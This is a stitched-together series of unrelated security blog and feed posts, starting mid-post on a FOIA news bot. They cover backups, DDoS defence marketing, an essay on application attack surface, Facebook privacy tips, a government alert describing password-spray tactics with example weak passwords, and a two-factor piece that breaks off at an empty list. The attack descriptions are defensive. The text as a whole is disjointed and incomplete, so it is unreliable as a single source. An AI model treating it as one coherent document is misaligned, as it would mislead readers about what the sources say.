Beyond that, we have two major goals for the @FOIAFeed project. One is to inspire journalists to see what their peers are doing with public records laws, and to hopefully find ways to push the envelope even further. We've heard from journalists that the world of FOIA requests can seem insular and intimidating, not least because of inadequacies in the law. Some requests get ignored, while others take years and come back almost completely censored, like a recent Miami Herald story that was just picked up by @FOIAFeed.

Despite its flaws, FOIA can produce powerful results. We hope that a steady stream of examples can help reduce the threshold for journalists to dive in (or even for FOIA pros to pick up new ideas).

A second goal is to underscore the importance of public records laws in investigative reporting. Highlighting the tools that journalists use to report their stories can help advocates for those tools, both when there is opportunity to expand and improve them (as with the FOIA Improvement Act of 2016, for example) or when there is a need to defend them (as with the recent "cyber-security" exemption added to Michigan's public records law, or the successful push to prevent a gutting of the Washington Public Records Act).

Currently, @FOIAFeed is monitoring news stories from the Associated Press, Reuters, the Los Angeles Times, the New York Times, Buzzfeed News, the Washington Post, the Chicago Tribune, the Miami Herald, CNN, Gizmodo, ProPublica, The Intercept, and the Marshall Project. It relies on RSS feeds from those organizations, and we plan to expand in the coming days to cover more outlets that engage in public records reporting and offer such feeds.
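The post doesn't describe the bot's matching logic, but at its core, a bot like this is just an RSS poll plus a keyword match. A hypothetical sketch of the matching step (the keyword list here is illustrative, not @FOIAFeed's actual criteria):

```python
import re

# Illustrative phrases that suggest a story relies on public-records requests.
FOIA_PATTERNS = [
    r"freedom of information act",
    r"\bfoia\b",
    r"public records request",
    r"open records law",
]

def is_foia_story(title: str, summary: str) -> bool:
    """Return True if an article's title or summary mentions public records."""
    text = f"{title} {summary}".lower()
    return any(re.search(pattern, text) for pattern in FOIA_PATTERNS)

# A real bot would loop over each outlet's RSS feed (e.g. parsed with the
# feedparser library), run new entries through is_foia_story(), and post
# the matches to Twitter.
```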

Additionally, we will soon be releasing the underlying source code that powers @FOIAFeed, and we hope it will be useful to other potential bot developers. Our bot focuses on public records laws, but as we develop and generalize it, we think it could be used as a broader public news alert system on any topic you’d like.

Why I’m Going to RSA 2018: CA Veracode’s New SVP of Engineering


Paiman Nodoushan has been working at CA Veracode for about two months. In that time, he's met a lot of his peers and claims he already remembers over 50% of their names, no small feat. Jokes aside, he's been getting to know his team, our projects, and the ins and outs of our entire SaaS operation. In our quick interview, he describes the team at Veracode as hard working and passionate, and goes on to point out that:

"One thing that I don't think people actually realize is how difficult it is to build a whole SaaS operation. From pre-sales through sales, to engineering, product management, and to post-sales, connecting to all the backend systems that exist - it takes years for companies to go and build that."

We're lucky our Founders had the foresight to keep us focused on a SaaS model in our earliest days, and that we have a leader like Paiman joining us to help drive further improvements in those operations. Paiman is headed to the RSA Conference with many others from the CA Technologies and Veracode teams; this will be his first RSA Conference ever.

Why Attend RSA?

Paiman lists three things he's looking to accomplish at the RSA Conference this year:

  1. Meeting Customers
  2. Hearing from Competition
  3. Learning

Be sure to catch Paiman at the CA Veracode booth this year and watch the full interview below to get to know him some more.

Kick Off Your Digital Spring Cleaning Efforts During World Backup Day

As spring blossoms into full force, millions of people will start to shed the heavy baggage and gear that kept them warm during winter by partaking in a tried and true practice: spring cleaning. While whipping yourself into a cleaning frenzy around your home, take a moment to extend your spring cleaning efforts into your digital environments as well. And there’s no better time to kick off a digital spring cleaning than during World Backup Day.

What exactly is World Backup Day? I’m glad you asked.

In today’s day and age, data is basically digital gold. It’s imperative to ensure your information is organized and backed up—not just for peace-of-mind, but to protect yourself against potential malware and ransomware threats. Still, a large number of people have never backed up their files, leaving themselves vulnerable to losing everything. In fact, this has become such a systemic problem that a whole day has been devoted to reversing this trend: World Backup Day. One of the main goals of the World Backup Day initiative is to reach people who have never backed their data up or people who aren’t even aware that data backups are a thing, let alone a crucial security measure.

For those who may not know, a backup is a second copy of all your important files and information, everything from photos and documents to emails and passwords. Storing all of that data in one place, like a personal computer or smartphone, is a woefully unsafe practice. Creating another copy of that data through a backup will ensure that it’s stored and kept safe somewhere else should catastrophe befall your personal mobile devices, or if they’re lost or stolen.

Data loss isn’t something that only happens to huge conglomerates or to unsuspecting victims in spy movies. Every individual is susceptible to data loss or theft, and backing up that data is an easy, relatively painless step to protect all of your personal information and prevent pesky hackers from truly swiping your stuff.

Think about it—if you’re targeted by a nasty piece of ransomware but have successfully performed a data backup, there’s absolutely no need for you to pay the ransom because you have a second, secure copy of all that data. It’s a simple preventative measure that can pay off big time should worse come to worst. Even the STOP. THINK. CONNECT. campaign, dedicated to increasing awareness around cybersecurity and providing information to help digital citizens protect against malware, lists regular data backups as an important security action to safeguard yourself against cybercrime.

There are two main approaches to backing up your data: either in the cloud or on an external hard drive. A cloud-based backup solution is great for people who don’t want to actively back up their devices and data or worry about the space constraints that come with most external hard drives. Simply subscribing to one of these cloud solutions will do the trick—your device’s files and data will automatically be backed up and protected without you having to lift more than a finger. Cloud-based services typically come with a monthly fee, and you’ll need a good internet connection to access them. If your connection is wonky or the site is undergoing maintenance, it can be difficult to access your backed-up data.

With an external hard drive, you can manually back up all your data and files yourself onto a physical device that you have access to anytime, anywhere. These drives are extremely reliable and a great way to achieve data redundancy. An external hard drive doesn’t hinge on internet access like cloud-based services and is an easy fix when transferring data to a new device. However, using external hard drives requires a more hands-on approach when it comes to actually backing up your data. The responsibility falls upon you to regularly perform these backups yourself. Storage space can also pose a problem. Look for an external drive with at least a terabyte of space to accommodate all of your data, which tends to accumulate quickly.
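As a minimal illustration of the manual, external-drive route, a backup can be as simple as archiving a folder to the mounted drive (the paths in the example comment are placeholders):

```python
import tarfile
import time
from pathlib import Path

def backup(source: str, dest_dir: str) -> Path:
    """Archive `source` into a timestamped .tar.gz under `dest_dir`."""
    dest = Path(dest_dir)
    dest.mkdir(parents=True, exist_ok=True)
    stamp = time.strftime("%Y%m%d-%H%M%S")
    archive = dest / f"backup-{stamp}.tar.gz"
    with tarfile.open(archive, "w:gz") as tar:
        # Store the folder under its own name inside the archive.
        tar.add(source, arcname=Path(source).name)
    return archive

# Example (hypothetical paths):
#   backup("/home/me/Documents", "/mnt/external-drive/backups")
```

Remember to periodically test restoring from these archives, since an unverified backup is only a hope.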

Here are some other digital spring cleaning tips to consider this World Backup Day:

  • Play it extra safe and go both routes for a thorough backup by using an external drive and subscribing to a cloud-based solution. After all, it’s better safe than sorry when it comes to your personal data.
  • Back up data from your mobile devices onto a central laptop or personal computer for an added layer of security and protection. Then work on backing up these devices with one (or both) of the methods laid out above.
  • Have at least one backup of your initial backup as a fail-safe measure.
  • Test your ability to restore data from backups regularly to ensure your backups have been performed correctly and that they haven’t been compromised.
  • Back up your data with a process and system that’s simple and works best for you—there’s no need to over complicate it!

Interested in learning more about IoT and mobile security tips and trends? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Kick Off Your Digital Spring Cleaning Efforts During World Backup Day appeared first on McAfee Blogs.

High Level Lessons – Enterprise Security Weekly #85

This week, Paul is joined by our very own Keith Hoodlet to review the book The Phoenix Project! In the news, we have updates from Cisco, Distil Networks, BeyondTrust, Cambridge Analytica, and more on this episode of Enterprise Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

DDoS attacks and impacts on various cloud computing components

Cloud computing is the subject of the era and a current domain of keen interest for organizations, and the technology is optimistically expected to be widely adopted. At the same time, with the move to the cloud computing paradigm, new security mechanisms and defense frameworks are being developed against the threats and malicious network attacks that endanger the service availability of cloud computing and the continuity of public and private services. The increasing usage of cloud services by government bodies poses an emerging threat to e-government and e-governance structures and to the continuity of public services of national and local government bodies. IoT, Industry 4.0, smart cities, and novel artificial intelligence applications that require connected devices and ever-present cloud platforms provide an ever-wider range of potential zombie armies for Distributed Denial of Service (DDoS) attacks, which are amongst the most critical attacks in the cloud computing environment. In this survey, we introduce recent reports and trends concerning this attack and its effects on the service availability of various cloud components. Furthermore, we discuss in detail the classification of DDoS attacks threatening cloud computing components, and we analyze and assess the emerging usage of cloud infrastructures, which poses both advantages and risks. Considering the various DDoS attack tools, proactive capabilities, virtual connecting infrastructures, and innovative methods that attackers are developing very rapidly to compromise and halt cloud systems, we assert that it is of crucial importance for the cyber security strategies of national, central, and local government bodies to consider pertinent preemptive countermeasures periodically and to revise their cyber strategies and action plans dynamically.

It’s Complicated – Operational Security for Developers

Application complexity and porosity

The life of a commercial software developer is a difficult one. Or at least we have to assume it is because of how many of them half-ass it when code starts to get complicated.

Okay, maybe that’s unfair. Maybe it’s not all half-assing. It’s complicated. Literally.

Many functions are overly complex, with so many variables and interactions that they are effectively untestable.

This is the 4th article of a pragmatic series to help you understand security in new and practical ways that you can apply immediately to improve software. So check back regularly and get a new story or learn about software security, whichever, and be sure to take the little quiz at the end. Somebody once forgot the quiz and a bad thing happened as an indirect result. Don’t let that happen to you.

Furthermore, coding security into these complex applications can also prevent the testing of that security, especially if part of that security is to encrypt, obfuscate, or otherwise shield the app code from reverse engineering. This creates code that may be more secure but is untestable and unmaintainably secure. That means that any changes to the software will be untestable and the security functions will be unverifiable.

And by code being unmaintainably secure, you run into the problem where it becomes really difficult to know what certain parts of the code even do. Besides being a bugfix issue, it’s a continuity issue since you can’t pass it off to other developers should the original developer leave. Because of that you end up seeing blocks of code separated into little cages by comments that says, “Don’t know what this does but if you delete it then everything will stop working. DON’T DELETE!!!”

Which brings us to the first point of security. Security is a function of separation. Either the separation between an asset and any threats exists or it does not. There are only 3 logical and proactive ways to create this separation:

  1. Move the asset to create a physical or logical barrier between it and the threats.
  2. Change the threat to a harmless state.
  3. Destroy the threat.

There is a fourth, which is destroy the asset, but that’s not really logical for business so let’s put that one aside.

In creating software, the concentration is often on the first and second means of separation. First, we choose environments where certain threats cannot exist and can then classify the software as “internal” or “not for high-risk environments”. That way, its use outside of the classification is supposedly the choice of the user. However, this concept has fallen out of favor over the years as increased inter-connectivity (intended or not) has dropped perimeter security all the way back to the application itself, and applications have become gateways. For example, a browser is an interactive gateway to many untrusted systems with no perimeter security, so no “internal only” classification can help protect it.

In the second, software designers are looking to filter interactions so that anything which can harm the environment or the application is removed. This is a means of changing the threat to a harmless state. However, this requires untrusted interaction with the filter, which is itself part of the program, and therefore increases the attack surface of the application. This is one of those cases where it's important to assure that the filter doesn't share resources with the application it's protecting. Additionally, it's not possible to know all the threats or all the possible types of attacks, because we can't know all possible motivations. Therefore applications need to focus on what they can accept, and this is known as whitelisting.

In whitelisting, we choose what we want or can work with from an interaction. So instead of filtering out the bad, we select the useful (good and bad intentions are currently difficult to discern before an attack, so they have no function in a passive filter) from an interaction and change or ignore the rest. If any element of the interaction doesn't match those in the whitelist, the proper reaction is to change it to what is accepted (sanitize) or drop the whole interaction (fail safely).
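A tiny sketch of those two whitelist reactions, using a username field as a made-up example (the allowed character set and length limit are assumptions, not a recommendation for every input):

```python
import re

# Whitelist: lowercase letters, digits, and underscore, 1-32 characters.
ALLOWED_USERNAME = re.compile(r"^[a-z0-9_]{1,32}$")

def sanitize_username(raw: str) -> str:
    """Sanitize: keep only whitelisted characters, drop everything else."""
    return re.sub(r"[^a-z0-9_]", "", raw.lower())[:32]

def accept_username(raw: str) -> str:
    """Fail safely: reject the whole interaction if it doesn't match."""
    if not ALLOWED_USERNAME.match(raw):
        raise ValueError("input rejected")
    return raw
```

Note the whitelist names what is allowed; there is no list of "bad" characters to keep up to date.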

But maybe you realize you’re making a whole lot more filters than you want to. Or maybe you realize that whitelist filters just aren’t possible. So maybe you should think about what untrusted interactions should be allowed from the start. Doing this is how you begin to simplify securing complex applications.

Application Porosity

Separation is a powerful security tactic but only if it’s applied correctly. It’s strongest when used as a preventative rather than a control. That means it’s better to not have an interaction than have it and need to control it.

Therefore when applying security to applications we need to see where there is the possibility for interaction and where there is not. We know some, all, or even none of these interactions may be required for operations. Like doors into a building, some of the doors are needed for customers and others for workers. However, each door is an interactive point which can increase both necessary operations and unwanted ones, like theft. In software, interactions can occur with users and systems, both trusted and untrusted, but also between the application and system components such as memory, keyboard, peripherals like printers and USB devices, and the hard drive.

All these interactive points together are known as the porosity and it’s what operational security is all about. I’m sure you’ve heard of opsec, right? It’s securing the stuff in motion, like a compiled or running application to assure a separation between a threat and an asset.

The porosity consists of 3 elements: Visibility, Access, and Trust, which further describe its function in these interactions so that the appropriate controls can be put in place. This is extremely important because security controls each match to specific protections of interactions. For example, the Confidentiality control, which includes Encryption and Obfuscation among other things, cannot prevent a message from getting stolen, changed, or destroyed. It can only delay its getting read. Therefore if the goal is to protect the message, adding encryption will only protect it from one type of threat: the getting-read part.

To apply the concept of porosity to coding, address the following:

  • What input do you trust? Do you take data directly from a user, hard-disk, memory, or network or do you select only the data you want to from the input to act on? Trusting even indirect input such as what the program placed in memory and on the hard disk is to ignore that resources can be replaced or snooped on in an environment outside the application.
  • Do you expect global limits within your environment? Environments can be changed outside the application and if protecting the whole environment is not in the scope of the application then the environment needs to be consistently defined as well as the means to constantly measure the state of the environment. Buffer overruns are the common occurrence of overloading a strict environment. These overflows don't need to be a mismanagement of the buffer environment but rather they could be the result of attacks made to shrink or limit the buffer environment outside the application so that when the input is written to buffer, it overflows, possibly performing malicious operations.
  • Address what is Visible, where direct Access is allowed, and what can be Trusted. Consider the environment. In a shared environment, such as a desktop, there is no trust possible as the application is just one of many residing on a foreign system. If the environment is a server, there is more trust allowed as users have less opportunity to insert or interact with other applications, hard drive, or memory. However there are exploits which take advantage of one known application on a server with an input weakness to attack another application on that same server. Be in constant awareness of the environment.

On a final note, we didn’t cover the “destroy the threat” part of logical separation. It wasn’t because we ran out of time. It’s because even if you can detect and respond to a threat, it’s an active defensive mechanism that can go badly if you’re not careful. Things like this are not easy to automate, and unless you’re developing a security product, they’re better left out of the application altogether. For example, IP jailing and account lock-outs are commonly used; however, when applying them to untrusted users over the Internet, you need to be sure the mechanism can’t be turned into a denial of service attack against a legitimate user. In one case, the developer didn’t allow the mechanism to whitelist specific IPs that could never be blocked; an attacker forged the IP address of the organization's gateway router, and they blocked themselves from all traffic to the application.
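To make that failure mode concrete, here is a hypothetical sketch of a lockout mechanism with an exempt list, so a forged source address can never lock out an address you depend on (the threshold and exempt address are assumptions):

```python
from collections import defaultdict

# Addresses that must never be blocked (e.g. the office gateway).
# 203.0.113.1 is a documentation address used here as a placeholder.
EXEMPT = {"203.0.113.1"}
MAX_FAILURES = 5

failures = defaultdict(int)
blocked = set()

def record_failure(ip: str) -> bool:
    """Count a failed login from `ip`; return True if it is now blocked.

    Exempt IPs are never counted or blocked, so forging their address
    can't be used to deny service to everyone behind them.
    """
    if ip in EXEMPT:
        return False
    failures[ip] += 1
    if failures[ip] >= MAX_FAILURES:
        blocked.add(ip)
    return ip in blocked
```

Even with the exemption, a mechanism like this deserves careful review before it ships inside an application rather than a security product.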

Application development will get complicated at times. To assure a good level of security, especially when an application is becoming so large and complex as to be untestable or unmaintainable, it’s important to address it from a porosity viewpoint. This will greatly simplify building security into the application by looking at where the application interacts with the outside world. That’s the porosity. In the immortal words of me, which I just made up right now to prove my point by throwing down a wise saying that applies to porosity:

“It’s how we are on the inside that matters to us but it’s how we are on the outside that matters to everyone else.”


Quiz – answer in the comments section and gain the respect and envy of your peers!

1. If your application is intended to be used in internal environments only, do you still need to sanitize interactions over the network and why?

2. You create a sanitizing whitelist for your application but the list itself is the current list of users. How can you utilize this list from the user database without sharing it as a resource?

3. Your web application allows logins from users over the Internet, so how do you prevent brute-force and dictionary password attacks against your users?

We Like Straight Talk – Business Security Weekly #79

Dan Wheatley, Partner and CEO at Straight Talk Agency, joins us for the interview this week. Tenable hires Morgan Stanley, Sift Science raised $53M Series D, and Virsec raised $24M Series B. This segment is about the companies making news with funding rounds, exits, and other impacts you need to know about in the industry.


Full Show Notes:


Visit for all the latest episodes!

#DeleteFacebook: Do You Really Need To?

Is it time to #deleteFacebook? Facebook’s long line of dramas has many of us rethinking our dependence on Mark Zuckerberg’s largest social media platform. While many of us were alarmed at the fake news allegations last year, the recent scandal with Cambridge Analytica has us genuinely spooked and now asking ourselves this question.

The fact that Facebook allowed British data analysis firm Cambridge Analytica to tap the Facebook profiles of more than 50 million users without their knowledge has many of us questioning both our – and our children’s – relationship with the social media platform. How compromised is our privacy? What’s really happening with our data? Is our every online move really being monitored?

The immediate reaction of many is to delete their Facebook accounts and insist their kids do the same. When news broke of the Cambridge Analytica scandal, the #deleteFacebook hashtag trended heavily on Twitter. Many high profile tech types deleted their personal and business Facebook accounts and, consequently, drove the Twittersphere into a frenzy.

To #DeleteFacebook Or Not To #DeleteFacebook?

But many of us can’t really afford to be idealists. Some of us run online businesses and rely heavily on Facebook. Others use Facebook for our jobs. Many of us (and our kids) use Facebook to run our social lives – organise events and parties, remember birthdays and stay in touch with friends and family across the world. And for nearly all of us, it is our digital scrapbook that preserves our important life events, shared moments and memories. In short, we would be lost without it.

While the black and white idealist in me absolutely agrees that we should delete Facebook, the realist in me acknowledges that life is often lived in the shades of grey. Facebook has spent more than a decade making itself a deeply entrenched part of our modern society. Saying farewell to this part of your life is a decision that I believe many of us would find almost impossible to make.

So, while deleting Facebook from your online life is the most drastic way of protecting your data, there are steps you can take to keep your account more secure and your personal information more private. Here are my top recommendations:

  1. Set up new logins for each app you are using.

    Setting up a new login and password for each app you’re using is a great way to protect yourself and your data online. Login may take fractionally longer but it will help ensure your data is not shared between different services.

  2. Review your third party apps – the ones you joined using Facebook.

    Facebook has made it just so easy for us to download apps using our Facebook settings that many of us have acquired quite the collection of apps. The problem is that Facebook provides these apps with our data, including our name, location, email or even our friends list. So, review these apps, people! Not sure where to start? Go to Settings > Apps > Logged in with Facebook and remove anything that doesn’t absolutely need access to your Facebook profile. You will still have to contact the app developer to ensure they delete the data they have already gathered on you. Tedious but worth it!

  3. Don’t overshare on social media.

    Oversharing online gets many of us including our kids into trouble and allows cybercriminals and ‘data analysis types’ the ability to form an accurate picture of us very quickly! Being conscious of what is publicly available from your social media profiles is essential. Ensure every member of the family knows to NEVER share their telephone number, address or details of their school online. Also rethink whether you really want your relationship status made public, or the city of your birth.

  4. Cull your Friends list.

    The Cambridge Analytica scandal should provide us all with a reality check about how we manage online friends. In 2015, an app entitled ‘this is your digital life’ was developed by Cambridge Professor Dr Aleksandr Kogan and then downloaded by 270,000 users. Those who opted in allowed the app access to their information – including their friends – which then gave Kogan access to the data of over 50 million Facebook users. Facebook have reportedly since changed their terms of service and claim app developers can no longer access this detail, or at least, not at the same level of detail. So, go through your friend list and delete those you barely know or who were just passing acquaintances. Do you really want to share your personal or family updates with these people?

  5. Choose a different social media platform to connect to apps.

    If an app lets you choose which account you use to login, pick one which holds limited data about its users. Twitter could be a good choice as it tends to hold less personal information about you.

And while I salute those who are bold enough to #deleteFacebook and insist their kids do so, I know that it isn’t for me. I choose to stay. I’ll navigate my way around the risks and flaws, so I can enjoy the upside – belonging to my community, keeping my job and adding to my digital scrapbook.

Till next time,

Alex x

The post #DeleteFacebook: Do You Really Need To? appeared first on McAfee Blogs.

Banks in Denial over Their Resilience to DDoS attacks

Are retail and investment banks in denial about being adequately protected from the frequent advanced DDoS attacks they’re getting hit with today? It is mid-March 2018 – just three months into the year – and three major banks have already been taken offline by DDoS attacks, making global headlines. Reuters reported that ABN Amro, ING and Rabobank were targeted by hackers, temporarily disrupting online and mobile banking services at the end of January (Reuters, Jan 29, 2018, “Dutch tax office, banks hit by DDoS cyber attacks”). Whatever DDoS attack protection they had in place proved to be insufficient.

So why are today’s DDoS attacks so successful against well-heeled financial institutions who spend more on cyber-security than most organizations spend on IT in total? The problem may lie with the “protection gap” within banks’ legacy DDoS attack protection solutions that have evolved over the last 20 years but focus principally on defending against large volumetric DDoS attacks. Banks typically rely on two DDoS architectural components:

Cloud DDoS Mitigation for elastic scalability during large volumetric attacks, and

Web Application Firewalls (WAFs) for encrypted traffic and to provide confidentiality and integrity for encrypted “Layer 7” banking applications

Legacy DDoS attack defenses often lack the automation required to provide real-time mitigation of today’s short-duration DDoS attacks. Corero’s analysis shows that even the largest banks frequently have this protection gap and it is the Achilles’ heel within their DDoS defenses.
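To see why automation matters, consider that a sub-10-minute attack is over before a human responder has even opened a ticket. A toy sliding-window rate detector illustrates the kind of check that must run continuously and react in real time (the threshold and window values here are illustrative; real appliances do this at line rate in hardware):

```python
from collections import deque

class RateDetector:
    """Toy packets-per-second detector: raises an alert the moment the rate
    inside a short sliding window exceeds a threshold, rather than waiting
    for a human (or a slow cloud redirect) to notice minutes later."""

    def __init__(self, threshold_pps, window=1.0):
        self.threshold = threshold_pps   # alert above this packets/second
        self.window = window             # sliding window length in seconds
        self.times = deque()             # timestamps of packets in the window

    def packet(self, ts):
        """Record one packet at time `ts`; return True if the rate is now
        above threshold (i.e. an alert should fire immediately)."""
        self.times.append(ts)
        while self.times and ts - self.times[0] > self.window:
            self.times.popleft()         # expire packets outside the window
        return len(self.times) / self.window > self.threshold
```

A 200-packet burst inside one second trips a 100 pps threshold on the spot; a legacy workflow that samples traffic every few minutes would likely miss the same burst entirely.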

From the Verizon DBIR graph below we see that Financial Services organizations are twice as likely to be hit with a DDoS attack as any other industry. Despite this fact, the protection-gap paradox suggests that banks remain either in ignorance or denial and, consequently, haven’t adjusted their DDoS defenses to be resilient to the short, sharp DDoS attacks that dominate today. Corero’s primary research shows that, in 2017, 96% of DDoS attacks were smaller than 5 Gbps and 71% lasted 10 minutes or less.

DDoS Industry

2017 Verizon Data Breach Investigations Report (DBIR)

Protecting all IP addresses presents economic and compliance challenges for banks using this legacy DDoS attack prevention architecture:

  • Always-on cloud DDoS mitigation across all IP address ranges is eye-wateringly expensive, so even wealthy banks tend not to cover all IP addresses - leaving some of their IP addresses unprotected against DDoS attacks.
  • To cover encrypted traffic, they are required to surrender crypto-keys which risks personal data protection regulation non-compliance.

These challenges effectively create a “Catch 22” scenario where these banks can’t be fully protected even by always-on cloud DDoS defenses.

Consumers now demand and regulations require that banks (and other enterprises) keep their services available with zero downtime and that personal data privacy is guaranteed. As the Dutch experience has demonstrated, modern DDoS cyber-attacks pose a serious threat to both service availability and data security. Consequently, banks are at risk from trading outages, punitive regulatory fines, and customer churn.

There is good news for banks. Corero’s SmartWall® Threat Defense System can supplement their existing defenses to deliver fully automated, real-time protection against today’s DDoS attacks. SmartWall mitigates both the short, sharp attacks and the larger attacks including amplification attacks that exploit the recently publicized “Memcached” vulnerability. Learn more

TA18-086A: Brute Force Attacks Conducted by Cyber Actors

Original release date: March 27, 2018 | Last revised: March 28, 2018

Systems Affected

Networked systems


According to information derived from FBI investigations, malicious cyber actors are increasingly using a style of brute force attack known as password spraying against organizations in the United States and abroad.

In February 2018, the Department of Justice in the Southern District of New York indicted nine Iranian nationals associated with the Mabna Institute for computer intrusion offenses related to activity described in this report. The techniques and activity described herein, while characteristic of Mabna actors, are not limited solely to use by this group.

The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) are releasing this Alert to provide further information on this activity.


In a traditional brute-force attack, a malicious actor attempts to gain unauthorized access to a single account by guessing the password. This can quickly result in the targeted account being locked out, as commonly used account-lockout policies allow three to five bad attempts during a set period of time. During a password-spray attack (also known as the “low-and-slow” method), the malicious actor attempts a single password against many accounts before moving on to attempt a second password, and so on. This technique allows the actor to remain undetected by avoiding rapid or frequent account lockouts.
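The two techniques differ only in iteration order, which is easy to see in code (the account and password lists here are hypothetical):

```python
def brute_force_order(accounts, passwords):
    """Traditional brute force: hammer one account with many passwords,
    tripping that account's lockout policy almost immediately."""
    return [(a, p) for a in accounts for p in passwords]

def password_spray_order(accounts, passwords):
    """Password spray ("low and slow"): try one password across every
    account before moving to the next password, so no single account
    sees enough rapid failures to trigger a lockout."""
    return [(a, p) for p in passwords for a in accounts]
```

With accounts ["alice", "bob"] and passwords ["Winter2018", "Password123!"], brute force tries alice twice in a row, while the spray touches alice only once per password pass.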

Password spray campaigns typically target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols. An actor may target this specific protocol because federated authentication can help mask malicious traffic. Additionally, by targeting SSO applications, malicious actors hope to maximize access to intellectual property during a successful compromise. 

Email applications are also targeted. In those instances, malicious actors would have the ability to utilize inbox synchronization to (1) obtain unauthorized access to the organization's email directly from the cloud, (2) subsequently download user mail to locally stored email files, (3) identify the entire company’s email address list, and/or (4) surreptitiously implement inbox rules for the forwarding of sent and received messages.

Technical Details

Traditional tactics, techniques, and procedures (TTPs) for conducting the password-spray attacks are as follows:

  • Using social engineering tactics to perform online research (i.e., Google search, LinkedIn, etc.) to identify target organizations and specific user accounts for initial password spray
  • Using easy-to-guess passwords (e.g., “Winter2018”, “Password123!”) and publicly available tools, execute a password spray attack against targeted accounts by utilizing the identified SSO or web-based application and federated authentication method
  • Leveraging the initial group of compromised accounts, downloading the Global Address List (GAL) from a target’s email client, and performing a larger password spray against legitimate accounts
  • Using the compromised access, attempting to expand laterally (e.g., via Remote Desktop Protocol) within the network, and performing mass data exfiltration using File Transfer Protocol tools such as FileZilla

Indicators of a password spray attack include:

  • A massive spike in attempted logons against the enterprise SSO portal or web-based application;
    • Using automated tools, malicious actors attempt thousands of logons, in rapid succession, against multiple user accounts at a victim enterprise, originating from a single IP address and computer (e.g., a common User Agent String).
    • Attacks have been seen to run for over two hours.
  • Employee logons from IP addresses resolving to locations inconsistent with their normal locations.
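The first indicator lends itself to a simple log check: count how many distinct accounts each source IP has failed against. A sketch, assuming a simplified log format of (source_ip, account, success) tuples (real SSO logs would need parsing first):

```python
from collections import defaultdict

def spray_suspects(events, min_accounts=20):
    """Flag source IPs whose failed logons touch an unusually large number
    of distinct accounts -- the signature of a spray, not of one forgetful
    user retrying their own password.

    `events` is an iterable of (source_ip, account, success) tuples; the
    min_accounts threshold is illustrative and should be tuned per site."""
    targets = defaultdict(set)
    for ip, account, success in events:
        if not success:
            targets[ip].add(account)          # distinct accounts per source IP
    return {ip for ip, accts in targets.items() if len(accts) >= min_accounts}
```

Note the contrast with a brute-force detector: an IP with 30 failures against a single account is a different (and more easily caught) pattern than 25 failures spread across 25 accounts.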

Typical Victim Environment

The vast majority of known password spray victims share some of the following characteristics [1][2]:

  • Use SSO or web-based applications with a federated authentication method
  • Lack multifactor authentication (MFA)
  • Allow easy-to-guess passwords (e.g., “Winter2018”, “Password123!”)
  • Use inbox synchronization, allowing email to be pulled from cloud environments to remote devices
  • Allow email forwarding to be setup at the user level
  • Have limited logging set up, creating difficulty during post-event investigations


A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts include:

  • Temporary or permanent loss of sensitive or proprietary information;
  • Disruption to regular operations;
  • Financial losses incurred to restore systems and files; and
  • Potential harm to an organization’s reputation.


Recommended Mitigations

To help deter this style of attack, the following steps should be taken:

  • Enable MFA and review MFA settings to ensure coverage over all active, internet facing protocols.
  • Review password policies to ensure they align with the latest NIST guidelines [3] and deter the use of easy-to-guess passwords.
  • Review IT helpdesk password management related to initial passwords, password resets for user lockouts, and shared accounts. IT helpdesk password procedures may not align to company policy, creating an exploitable security gap.
  • Many companies offer additional assistance and tools that can help detect and prevent password spray attacks, such as the Microsoft blog released on March 5, 2018. [4]
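The deny-list approach that recent NIST guidance recommends (check candidate passwords against commonly used or previously breached values) can be sketched in a few lines; the sample list below is a tiny illustration, and a real deployment would load a large corpus of breached passwords:

```python
# Tiny illustrative deny list; a production system would load a large
# breached-password corpus and compare case-insensitively, as here.
DENY_LIST = {"winter2018", "password123!", "password", "123456", "qwerty"}

def password_allowed(candidate: str, min_length: int = 8) -> bool:
    """Reject passwords that are too short or that appear on the deny list,
    blocking exactly the easy-to-guess values spray attacks rely on."""
    if len(candidate) < min_length:
        return False
    return candidate.lower() not in DENY_LIST
```

A check like this, run at password-set time, removes “Winter2018”-style values from the population of valid passwords, which is what makes spraying pay off in the first place.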

Reporting Notice

The FBI encourages recipients of this document to report information concerning suspicious or criminal activity to their local FBI field office or the FBI’s 24/7 Cyber Watch (CyWatch). Field office contacts can be identified at CyWatch can be contacted by phone at (855) 292-3937 or by e-mail at When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. Press inquiries should be directed to the FBI’s national Press Office at or (202) 324-3691.


Revision History

  • March 27, 2018: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Protecting Yourself from a Data Breach Requires Two Step Authentication

Have you ever thought about how a data breach could affect you personally? What about your business? Either way, it can be devastating. Fortunately, there are ways that you can protect your personal or business data, and it’s easier than you think. Don’t assume that protecting yourself is impossible just because big corporations get hit with data breaches all of the time. There are things you can do to get protected.

  • All of your important accounts should use two-factor authentication. This helps to eliminate the exposure of passwords: once one of the bad guys gets your password, if that’s all they need to access your account, they are already in.
  • When using two-factor authentication, you must first enter your password, but you also have to complete a second step. The website sends the account owner a unique code to their phone, also known as a “one-time password.” The only way to access the account, even with the correct password, is to enter that code, and the code changes each time. So, unless a hacker has your password AND your mobile phone, they can’t get into your account.
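Under the hood, the one-time codes most of these sites text or generate follow the standard HOTP/TOTP construction (RFC 4226 and RFC 6238). A compact sketch, using only the Python standard library:

```python
import hashlib
import hmac
import struct
import time

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HMAC-based one-time password."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                  # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret: bytes, for_time=None, step: int = 30) -> str:
    """RFC 6238 time-based OTP: HOTP keyed to the current 30-second window,
    which is why the code changes each time you log in."""
    t = int(time.time()) if for_time is None else int(for_time)
    return hotp(secret, t // step)
```

Because the counter is derived from the clock, the server and your phone independently compute the same short-lived code; an attacker with only your password cannot.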

All of the major websites that we most commonly use have some type of two-factor authentication. They are spelled out, below:


